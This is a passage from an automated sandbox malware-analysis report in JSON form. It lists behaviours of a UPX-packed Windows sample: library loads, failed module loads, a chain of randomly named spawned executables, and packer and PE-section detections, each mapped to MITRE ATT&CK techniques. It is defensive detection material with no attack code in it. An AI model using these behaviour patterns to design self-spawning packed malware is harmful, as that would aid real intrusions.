00000000-00003164)\n \"tthvrx.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003164)\n \"rddvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000848)\n \"rddvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000848)\n \"rddvv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000848)\n \"rddvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000848)\n \"vjtpp.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00001880)\n \"vjtpp.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001880)\n \"vjtpp.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001880)\n \"tlflpxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000456)\n \"tlflpxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000456)\n \"tlflpxl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000456)\n \"tlflpxl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000456)\n \"ndnvbhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001376)\n \"ndnvbhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001376)\n \"ndnvbhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001376)\n \"ndnvbhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001376)\n \"086684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003156)\n \"086684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003156)\n \"086684.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003156)\n \"086684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003156)\n \"64644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000896)\n \"64644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000896)\n \"64644.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000896)\n \"64644.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000896)\n \"24440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003628)\n \"24440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003628)\n \"24440.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003628)\n \"24440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003628)\n \"08802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003536)\n \"08802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003536)\n \"08802.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003536)\n \"08802.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003536)\n \"0248006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003780)\n \"0248006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003780)\n \"0248006.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003780)\n \"0248006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003780)\n \"226688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004524)\n \"226688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004524)\n \"226688.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004524)\n \"226688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004524)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"202828.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"202828.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"pndnt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"pndnt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhhbnrn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhhbnrn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"txphbj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"txphbj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0862264.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0862264.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6042668.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6042668.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6408002.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6408002.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8266402.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8266402.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jdtpf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jdtpf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tbhlt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tbhlt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"82880.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"82880.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"44882.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"44882.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"028488.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"028488.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"62820.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"62820.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"22884.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"22884.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"88220.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"88220.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"2466400.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"2466400.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"04466.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"04466.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"088400.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"088400.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"444866.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"444866.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66822.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66822.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tvvfv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tvvfv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bvfpxr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bvfpxr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"htbtt.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"htbtt.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6266488.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6266488.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fttbvhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fttbvhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fnhrv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fnhrv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rddvv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rddvv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tlflpxl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tlflpxl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ndnvbhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ndnvbhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"086684.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"086684.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64644.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64644.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24440.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24440.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"08802.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"08802.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0248006.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0248006.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"226688.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"226688.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"2662206.exe\" (UID: 00000000-00005996)\n Spawned process \"2668286.exe\" (UID: 00000000-00005980)\n Spawned process \"22420.exe\" (UID: 00000000-00006096)\n Spawned process \"202828.exe\" (UID: 00000000-00005856)\n Spawned process \"pndnt.exe\" (UID: 00000000-00005832)\n Spawned process \"rbbttj.exe\" (UID: 00000000-00004164)\n Spawned process \"tdthpd.exe\" (UID: 00000000-00005932)\n Spawned process \"rhhbnrn.exe\" (UID: 00000000-00004260)\n Spawned process \"txphbj.exe\" (UID: 00000000-00004160)\n Spawned process \"0862264.exe\" (UID: 00000000-00004176)\n Spawned process \"6042668.exe\" (UID: 00000000-00005956)\n Spawned process \"6408002.exe\" (UID: 00000000-00004220)\n Spawned process \"8266402.exe\" (UID: 00000000-00003476)\n Spawned process \"trtdln.exe\" (UID: 00000000-00005924)\n Spawned process \"jdtpf.exe\" (UID: 00000000-00003904)\n Spawned process \"tbhlt.exe\" (UID: 00000000-00003652)\n Spawned process \"trxpd.exe\" (UID: 00000000-00005900)\n Spawned process \"82880.exe\" (UID: 00000000-00001976)\n Spawned process \"44882.exe\" (UID: 00000000-00002492)\n Spawned process \"828882.exe\" (UID: 00000000-00003980)\n Spawned process \"2204222.exe\" (UID: 00000000-00003500)\n Spawned process \"028488.exe\" (UID: 00000000-00004388)\n Spawned process \"62820.exe\" (UID: 00000000-00003968)\n Spawned process \"80840.exe\" (UID: 00000000-00001536)\n Spawned process \"22884.exe\" (UID: 00000000-00003556)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"2662206.exe\" (UID: 00000000-00005996)\n Spawned process \"2668286.exe\" (UID: 00000000-00005980)\n Spawned process \"22420.exe\" (UID: 00000000-00006096)\n Spawned process \"202828.exe\" (UID: 00000000-00005856)\n Spawned process \"pndnt.exe\" (UID: 00000000-00005832)\n Spawned process \"rbbttj.exe\" (UID: 00000000-00004164)\n Spawned process \"tdthpd.exe\" (UID: 00000000-00005932)\n Spawned process \"rhhbnrn.exe\" (UID: 00000000-00004260)\n Spawned process \"txphbj.exe\" (UID: 00000000-00004160)\n Spawned process \"0862264.exe\" (UID: 00000000-00004176)\n Spawned process \"6042668.exe\" (UID: 00000000-00005956)\n Spawned process \"6408002.exe\" (UID: 00000000-00004220)\n Spawned process \"8266402.exe\" (UID: 00000000-00003476)\n Spawned process \"trtdln.exe\" (UID: 00000000-00005924)\n Spawned process \"jdtpf.exe\" (UID: 00000000-00003904)\n Spawned process \"tbhlt.exe\" (UID: 00000000-00003652)\n Spawned process \"trxpd.exe\" (UID: 00000000-00005900)\n Spawned process \"82880.exe\" (UID: 00000000-00001976)\n Spawned process \"44882.exe\" (UID: 00000000-00002492)\n Spawned process \"828882.exe\" (UID: 00000000-00003980)\n Spawned process \"2204222.exe\" (UID: 00000000-00003500)\n Spawned process \"028488.exe\" (UID: 00000000-00004388)\n Spawned process \"62820.exe\" (UID: 00000000-00003968)\n Spawned process \"80840.exe\" (UID: 00000000-00001536)\n Spawned process \"22884.exe\" (UID: 00000000-00003556)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" was detected as \"UPX\" and name: \"Packer\"\n \"xvpdt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hbpvtv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hfxhd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"vjdjljv.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rffrrb.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nvdfbr.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"02886.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2086280.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"84862.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xppdbt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0082442.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"hvtvd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"djlrn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"86488.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"246648.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xjnvbp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tjnrdtx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"2860666.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"46228.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"226688.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"88406.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"0248006.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"08802.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"24440.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03edc6a@ADVAPI32.dll\"\n \"0e000f00703fdc6a@ADVAPI32.dll\"\n \"0e000f00cc3fdc6a@ADVAPI32.dll\"\n \"11001200b447dc6a@ADVAPI32.dll\"\n \"110012004848dc6a@ADVAPI32.dll\"\n \"120013008c48dc6a@ADVAPI32.dll\"\n \"12001300e448dc6a@ADVAPI32.dll\"\n \"14001500386edc6a@ADVAPI32.dll\"\n \"14001500506edc6a@ADVAPI32.dll\"\n \"14001500686edc6a@ADVAPI32.dll\"\n \"17001800806edc6a@ADVAPI32.dll\"\n \"0d000e00986edc6a@ADVAPI32.dll\"\n \"11001200a86edc6a@ADVAPI32.dll\"\n \"11001200bc6edc6a@ADVAPI32.dll\"\n \"0f001000fc6fdc6a@ADVAPI32.dll\"\n \"140015003c70dc6a@ADVAPI32.dll\"\n \"140015005470dc6a@ADVAPI32.dll\"\n \"0c000d009c70dc6a@ADVAPI32.dll\"\n \"0c000d00ac70dc6a@ADVAPI32.dll\"\n \"0e000f00bc70dc6a@ADVAPI32.dll\"\n \"0e000f00cc70dc6a@ADVAPI32.dll\"\n \"0b000c00dc70dc6a@ADVAPI32.dll\"\n \"180019001473dc6a@RPCRT4.dll\"\n \"130014004073dc6a@RPCRT4.dll\"\n \"140015005473dc6a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"2662206.exe\" called \"CreateProcessA\" with parameter \"c:\\2668286.exe\" - (UID: 00000000-00005996)\n \"tbhlt.exe\" called \"CreateProcessA\" with parameter \"c:\\trxpd.exe\" - (UID: 00000000-00003652)\n \"tvvfv.exe\" called \"CreateProcessA\" with parameter \"c:\\phtdn.exe\" - (UID: 00000000-00002172)\n \"6266488.exe\" called \"CreateProcessA\" with parameter \"c:\\86602.exe\" - (UID: 00000000-00003380)\n \"fttbvhn.exe\" called \"CreateProcessA\" with parameter \"c:\\dbbpb.exe\" - (UID: 00000000-00003200)\n \"tthvrx.exe\" called \"CreateProcessA\" with parameter \"c:\\rddvv.exe\" - (UID: 00000000-00003164)\n \"vjtpp.exe\" called \"CreateProcessA\" with parameter \"c:\\tlflpxl.exe\" - (UID: 00000000-00001880)\n \"6460462.exe\" called \"CreateProcessA\" with parameter \"c:\\24440.exe\" - (UID: 00000000-00002724)\n \"226688.exe\" called \"CreateProcessA\" with parameter \"c:\\46228.exe\" - (UID: 00000000-00004524)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has an writable section named \"UPX0\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has an writable section named \"UPX1\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has an writable section named \"UPX2\"\n \"xvpdt.exe\" has an writable section named \"UPX0\"\n \"xvpdt.exe\" has an writable section named \"UPX1\"\n \"xvpdt.exe\" has an writable section named \"UPX2\"\n \"hbpvtv.exe\" has an writable section named \"UPX0\"\n \"hbpvtv.exe\" has an writable section named \"UPX1\"\n \"hbpvtv.exe\" has an writable section named \"UPX2\"\n \"hfxhd.exe\" has an writable section named \"UPX0\"\n \"hfxhd.exe\" has an writable section named \"UPX1\"\n \"hfxhd.exe\" has an writable section named \"UPX2\"\n \"vjdjljv.exe\" has an writable section named \"UPX0\"\n \"vjdjljv.exe\" has an writable section named \"UPX1\"\n \"vjdjljv.exe\" has an writable section named \"UPX2\"\n \"rffrrb.exe\" has an writable section named \"UPX0\"\n \"rffrrb.exe\" has an writable section named \"UPX1\"\n \"rffrrb.exe\" has an writable section named \"UPX2\"\n \"nvdfbr.exe\" has an writable section named \"UPX0\"\n \"nvdfbr.exe\" has an writable section named \"UPX1\"\n \"nvdfbr.exe\" has an writable section named \"UPX2\"\n \"02886.exe\" has an writable section named \"UPX0\"\n \"02886.exe\" has an writable section named \"UPX1\"\n \"02886.exe\" has an writable section named \"UPX2\"\n \"2086280.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has an executable section named \"UPX0\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" has an executable section named \"UPX1\"\n \"xvpdt.exe\" has an executable section named \"UPX0\"\n \"xvpdt.exe\" has an executable section named \"UPX1\"\n \"hbpvtv.exe\" has an executable section named \"UPX0\"\n \"hbpvtv.exe\" has an executable section named \"UPX1\"\n \"hfxhd.exe\" has an executable section named \"UPX0\"\n \"hfxhd.exe\" has an executable section named \"UPX1\"\n \"vjdjljv.exe\" has an executable section named \"UPX0\"\n \"vjdjljv.exe\" has an executable section named \"UPX1\"\n \"rffrrb.exe\" has an executable section named \"UPX0\"\n \"rffrrb.exe\" has an executable section named \"UPX1\"\n \"nvdfbr.exe\" has an executable section named \"UPX0\"\n \"nvdfbr.exe\" has an executable section named \"UPX1\"\n \"02886.exe\" has an executable section named \"UPX0\"\n \"02886.exe\" has an executable section named \"UPX1\"\n \"2086280.exe\" has an executable section named \"UPX0\"\n \"2086280.exe\" has an executable section named \"UPX1\"\n \"84862.exe\" has an executable section named \"UPX0\"\n \"84862.exe\" has an executable section named \"UPX1\"\n \"xppdbt.exe\" has an executable section named \"UPX0\"\n \"xppdbt.exe\" has an executable section named \"UPX1\"\n \"0082442.exe\" has an executable section named \"UPX0\"\n \"0082442.exe\" has an executable section named \"UPX1\"\n \"hvtvd.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xvpdt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hbpvtv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hfxhd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vjdjljv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rffrrb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nvdfbr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"02886.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2086280.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"84862.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xppdbt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0082442.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hvtvd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"djlrn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"86488.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"246648.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xjnvbp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tjnrdtx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2860666.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"46228.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"226688.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"88406.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0248006.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"08802.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"24440.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"2662206.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"2662206.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"2662206.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"2662206.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"2662206.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"2662206.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" reads file \"c:\\0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\"\n \"0f6b9ed18c9cf98256a3fc71eceb2cf8d900e1382638c4559488854aa3cae7ea.exe\" reads file \"c:\\2662206.exe\"\n \"2662206.exe\" reads file \"c:\\2662206.exe\"\n \"2662206.exe\" reads file \"c:\\2668286.exe\"\n \"2668286.exe\" reads file \"c:\\2668286.exe\"\n \"2668286.exe\" reads file \"c:\\22420.exe\"\n \"22420.exe\" reads file 